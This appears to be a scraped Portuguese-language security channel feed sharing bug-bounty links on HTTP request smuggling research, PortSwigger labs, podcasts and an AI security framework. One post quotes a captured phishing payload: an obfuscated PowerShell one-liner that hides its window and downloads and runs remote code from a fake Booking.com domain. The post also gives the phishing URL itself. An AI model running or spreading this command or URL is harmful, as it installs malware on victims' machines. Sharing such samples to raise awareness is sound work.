Zeroc00i News & Tricks
Fim da live Fiz meu papel O James me mostrou o custom action na pratica hahaha, dahora e humilde
Sou um cara muito sonhador e isso faz meus dias ter um brilho um pouco a mais com coisas que podem parecer triviais para outras pessoas.

Nessa live eu mandei um comentario falando pro James que seria legal ter uma funcionaliade no Burp

Ele não só demonstrou ao vivo como ele implementaria, como agora publicou no repositório da Portswigger e agradeceu minha sugestão no linkedin. Muito dahora!
HTTP pipelining ou request smuggling?
Saiba como diferenciar:
https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling
https://phrack.org/issues/72/3_md#scan
Vídeo que tô assistindo hoje, da época que o ManoelT fazia live com uma galera. É antigo, de 5 anos atrás, mas com certeza vale ainda (os conceitos se aplicam na atualidade).

https://www.youtube.com/watch?v=1RmBufOHkPo
YouTube
Conversa de Bug Bounty #2 - Fontes de Estudo
Vamos conversar mais uma vez sobre Bug Bounty, dessa vez nosso tema vai ser sobre fontes de estudo para atuar como um bug hunter. É uma conversa e portanto esperamos que você nos mande perguntas e comentários.
Fim da live
Fiz meu papel
O James me mostrou o custom action na pratica hahaha, dahora e humilde
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
Vai começar
https://github.com/aliasrobotics/cai

Não uso muito essas coisas prontas de IA, mas fiquei curioso sim. Alguem a fim de testar e dar um feedback se vale a pena?
GitHub
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security
Cybersecurity AI (CAI), the framework for AI Security - aliasrobotics/cai
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
É hoje
Zeroc00i News & Tricks
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;" Ray ID: 3658b22362ef2157…
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;"                                                                                                                                                     Ray ID: 3658b22362ef2157 powershell -nop -ep bypass -C ((Add-Type '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);' -Name W -PassThru)::ShowWindow((Get-Process -Id $PID).MainWindowHandle,0));Write-Host "Please wait.";iex([IO.StreamReader]::new([Net.WebRequest]::Create("htt"+"p:/"+"/www-"+"acco"+"unt-"+"book"+"ing"+".co"+"m/c.php?a=0"+"").GetResponse().GetResponseStream())).ReadToEnd();$v="d1008b"
Página fake (reparem na URL):
Ohhh os caras hahaha. Criatividade sem limite sempre, impressionante

http://account.booking.xn--comdetailrestric-access-ge5vga.www-account-booking.com/en/
Esse vídeo saiu hoje e vai estar mt massa com certeza!
Principalmente depois daquela CVE da akamai que mencionamos aqui

https://www.youtube.com/watch?v=rr5VvMx4dT0
YouTube
Akamai's Ryan Barnett on WAFs, Unicode Confusables, and Triage Stories (Ep. 135)
Episode 135: In this episode of Critical Thinking - Bug Bounty Podcast Justin sits down with Ryan Barnett for a deep dive on WAFs. We also recap his Exploiting Unicode Normalization talk from DEFCON, and get his perspective on bug hunting from his time at…
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
Para ler depois ++
https://medium.com/@zodiacHacker/http-request-smuggling-in-bug-bounty-hunting-abf0e4e75b73
Valeu pela indicação @matheus_wnc
Medium
HTTP Request Smuggling In Bug Bounty Hunting
HTTP Request Smuggling In Bug Bounty Hunting
The primary mistake seen in the wild is servers assuming that every HTTP/1.1 request sent down a given TLS connection must have the same…
https://www.linkedin.com/posts/bruno-menozzi_resolvemos-o-problema-colocamos-uma-regra-activity-7361758679181725698-PqQs
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto!
Primeiro porquê sou fã demais do James Kettle
E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo http/1.1

Tu não leu o paper dele que enviei no grupo? Tudo bem
Não viu a talk dele na Defcon que enviei aqui? Tudo bem tambem
Não fez ainda os labs da portswigger que explora a vulnerabilidade que ele demonstrou? Beleza

Agora ele simplesmente vai resolver o lab ao vivo. É só abrir o vídeo e pegar a pipoca.

📅 Sexta-feira (15 de agosto 2025) às 15hs

Link da live no dia que tu vai acessar:
https://www.youtube.com/live/B7p8dIB7bFg?si=GaeBuHlNvFuHe4KR

Lab: https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-0cl-request-smuggling

Curtiu ser lembrado? Interage aqui com o post! Isso motiva a trazer mais conteúdo disso e saber que estão curtindo o que tô postando! É um ótimo feedback do nosso trabalho aqui. TMJ
Before
After
Back to Top